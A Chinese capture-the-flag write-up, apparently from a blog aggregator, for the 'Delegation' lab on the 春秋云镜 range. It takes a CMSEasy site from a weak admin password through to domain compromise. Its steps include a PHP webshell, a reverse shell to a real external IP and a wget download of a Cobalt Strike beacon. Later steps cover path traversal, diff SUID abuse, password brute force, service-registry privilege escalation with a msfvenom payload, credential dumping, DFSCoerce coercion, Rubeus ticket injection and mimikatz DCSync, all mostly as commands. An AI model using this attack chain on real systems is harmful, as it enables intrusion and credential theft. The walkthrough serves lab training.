首页 > 其他分享 >春秋云镜 Delegation WP

春秋云镜 Delegation WP

时间:2023-11-24 21:55:57浏览次数:23  
标签:4.7 exe 4.19 WP 云镜 Delegation 4.45 open 172.22

春秋云镜 Delegation WP

扫描

39.99.129.120:21 open
39.99.129.120:22 open
39.99.129.120:80 open
39.99.129.120:3306 open

在url后面填上admin进入后台 弱口令admin 123456

踩坑之路:
在编辑模板处写马

<?=system($_POST[1]);die()?>

不能用常规的一句话木马,后面填上die()是避免其他信息的干扰

<?php @eval($_POST[1]);?>


反弹shell和再写一个新马都不行,wget远程下载cs的linux版木马,上线cs
但是发现wget能远程下载,chmod 777 cslinux后./cslinux却执行不了
最后直接在编辑模板处写反弹shell命令

<?=system('bash -i >& /dev/tcp/xxx/6666 0>&1');?>
& /dev/tcp/114.96.104.240/6666 0>&1');?>

成功反弹到shell
但是反弹shell却反弹到另一台nginx机器上了(非常神奇)

测试目标出网

curl ip.io

在tmp目录里远程下载cs的linux木马

想控制最开始的那个web服务器

远程下载cs的linux木马
然后执行,失败,会出现这种状况

然后在cmseasy下载源码,发现有了目录遍历漏洞,但是无法访问到模板文件


找到模板编辑处的模板文件,/template/wap/

最后回到编辑模板处,点开tag下面的show.html抓包

观察sid=tag_d_show_html&slen=1644&scontent=..
考虑在这里把木马写到网站根目录下(/template/wap/tag往后退三次)
sid=tag_d_..d..d..d_shell.php&slen=1644&scontent=

sid=tag_d
..d..d.._d_shell2.php&slen=1644&scontent=
哥斯拉连接

本机搜索flag
先搜索提权方式
https://gtfobins.github.io/


猜flag在root目录下,失败
发现home目录下有flag,但无权限读取

diff的suid提取读取

diff --line-format=%L /dev/null flag01.txt


得到hint

Here is the hint: WIN19\Adrian

I'll do whatever I can to rock you...

上传fscan,frpc,frpc.ini和cs的linux下的木马

172.22.4.36:21 open
172.22.4.7:88 open
172.22.4.36:3306 open
172.22.4.19:445 open
172.22.4.45:445 open
172.22.4.7:445 open
172.22.4.19:139 open
172.22.4.45:139 open
172.22.4.7:139 open
172.22.4.19:135 open
172.22.4.45:135 open
172.22.4.7:135 open
172.22.4.45:80 open
172.22.4.36:80 open
172.22.4.36:22 open
[*] NetInfo:
[*]172.22.4.7
   [->]DC01
   [->]172.22.4.7
[*] NetInfo:
[*]172.22.4.19
   [->]FILESERVER
   [->]172.22.4.19
[*] NetInfo:
[*]172.22.4.45
   [->]WIN19
   [->]172.22.4.45
[*] NetBios: 172.22.4.45     XIAORANG\WIN19                 
[*] NetBios: 172.22.4.19     FILESERVER.xiaorang.lab             Windows Server 2016 Standard 14393 
[*] 172.22.4.7  (Windows Server 2016 Datacenter 14393)
[*] NetBios: 172.22.4.7      [+]DC DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393 
[*] WebTitle: http://172.22.4.36        code:200 len:1462   title:中文网页标题
[*] WebTitle: http://172.22.4.45        code:200 len:703    title:IIS Windows Server

172.22.4.36 入口机
172.22.4.19 文件服务器
172.22.4.45 域成员
172.22.4.7域控
发现入口机的3306端口开放
查看数据库配置文件

没有找到什么重要东西
根据提示,看上了172.22.4.45,
爆破出密码babygirl1
远程连接一下

更改一下密码

proxychains -q rdesktop 172.22.4.45 -u Adrian -p babygirl1

运行一下PrivescCheck.ps1,然后访问html文件

发现这个提权方式

msf生成一个木马

msfvenom -p windows/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=6666 -f exe > bind.exe

监听

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set rhost 172.22.4.45
set lport 6666
run

提权

reg add HKLM\SYSTEM\CurrentControlSet\Services\gupdate /v ImagePath /t REG_EXPAND_SZ /d  "C:\Users\Adrian\Desktop\bind.exe"

sc start "gupdate"
发现很快就died了

进程迁移

getpid
migrate 6666



load kiwi
creds_all



但无法直接进行交互性shell(可能是我的msf有问题)


也可以哈希传递

继续渗透
分析 Bloodhound,发现 WIN19和DC01都是非约束委派
还可以用adfind

AdFind.exe -b "DC=XIAORANG,DC=LAB" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

先执行(这里在psexec的哈希传递里面)

Rubeus.exe monitor /interval:1 /filteruser:DC01$


使用DFSCoerce强制触发回连到win19并且获取到DC01的TGT
https://github.com/Wh04m1001/DFSCoerce

proxychains -q python3 dfscoerce.py -u WIN19$ -hashes :edb104228cd2d08d1182307291f1a9f6 -d xiaorang.lab win19 172.22.4.7

可以看到接受到了来着域控的TGT

Rubeus.exe ptt /ticket:xxx


mimikatz拿域控的administrator的哈希

mimikatz.exe "log" "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit


之后可以用域控的administrator哈希拿下fileserver和域控的flag了

参考文章

https://blog.csdn.net/qq_35607078/article/details/132274840

标签:4.7,exe,4.19,WP,云镜,Delegation,4.45,open,172.22
From: https://www.cnblogs.com/thebeastofwar/p/17788102.html

相关文章

  • python wps异常处理: 服务启动异常-发生意外
    服务异常:找到单元xlwings._xlwindowsself._xl=COMRetryObjectWrapper(DispatchEx("ket.Application"))#内核不支持,只有was无excel参考:https://blog.csdn.net/oldman_g/article/details/124022289 ---发生意外:路径不完整,保存完整路径 ......
  • 0xGame week4-WEB wp
    0xGame个人结语完结撒花!!!学到了很多很多,算是我这个WEB菜鸡过渡期的一个见证吧。0xGame虽然也没做出来几道(大嘘),但是一步步跟着复现也学了很多好玩的知识点和思路,希望下次能进化成WEBak哥hhhhhh~~~~来看最后一周,全是java框架,麻了。spring整体不难,hint把解题方法基本写脸上了,网上......
  • WPF数据绑定
    依赖对象做为数据源如果绑定的源是依赖对象的依赖属性,那么这个依赖属性发生实时变化的时候,会同步到绑定目标。如果绑定的源是非依赖属性,那么这个属性发生变化的的时候,不会同步到绑定目标。被绑定的数据源,需要是属性。<StackPanel><!--目标对象:TextBlock-->......
  • WPF使用多个ContextMenu菜单并绑定指定控件右键事件触发菜单,以及后台获取ContextMenu
    前端代码<Windowx:Class="EVES_ManualTest.CurveForm"xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"xmlns:d="http://schema......
  • WPS中VLOOKUP函数的使用
    VLOOKUP函数的基本概念VLOOKUP函数是WPS表格中的一个内置函数,主要用于垂直查找数据。它的基本语法是:VLOOKUP(查找值,表格数组,列索引数,查找方式)。其中,查找值是我们需要在数据表中查找的值;表格数组是包含数据的区域;列索引数是我们希望返回的数据在表格数组中的列数;查找方式决定了......
  • [WPF]动手写一个简单的消息对话框
    消息对话框是UI界面中不可或缺的组成部分,用于给用户一些提示,警告或者询问的窗口。在WPF中,消息对话框是系统原生(user32.dll)的MessageBox,无法通过Style或者Template来修改消息对话框的外观。因此,当需要一个与应用程序主题风格一致的消息对话框时,只能自己动手造轮子了。确定“轮子”......
  • HWS山大专区PWN双一血 & CRYPTO-WP
    2023.11.18两天半的比赛,就打了半天(因为要赶去打香山杯决赛了),不过结果还算好,人生第一次拿了两个一血hhh。写wp的时候人在中大南校北门的酒店里:)controller格式化字符串泄露canary之后打ret2libc即可。fromevilbladeimport*context(os='linux',arch='amd64')context(os=......
  • CTFshow Reverse 36D杯 签到 wp
    使用IDA查看源码查看代码int__cdeclmain(intargc,constchar**argv,constchar**envp){__int64v3;//rdx__int64v4;//rcxintv6;//[rsp+4h][rbp-8Ch]unsignedintv7;//[rsp+8h][rbp-88h]intv8;//[rsp+Ch][rbp-84h]intv9[31];//[......
  • wpf和winform的优缺点
    WPF(WindowsPresentationFoundation)和WinForm(WindowsForms)是两种不同的Windows应用程序开发框架。以下是它们的优缺点:WPF(优点):基于.NETFramework,与XAML语言结合,易于设计界面。强大的图形和动画功能,适用于创建具有丰富视觉效果的应用程序。支持Orientation和Resolution变化,......
  • wps表格怎么打印选中区域的内容?
    打印选中区域的内容,您可以按照以下步骤进行操作:选择要打印的区域打开WPS表格,在工作表中选择您希望打印的区域。您可以拖动鼠标或使用键盘中的方向键来选择单元格。设置打印区域一旦您选中了需要打印的区域,点击顶部菜单栏中的"文件"选项。在弹出菜单中,选择"打印"选项。......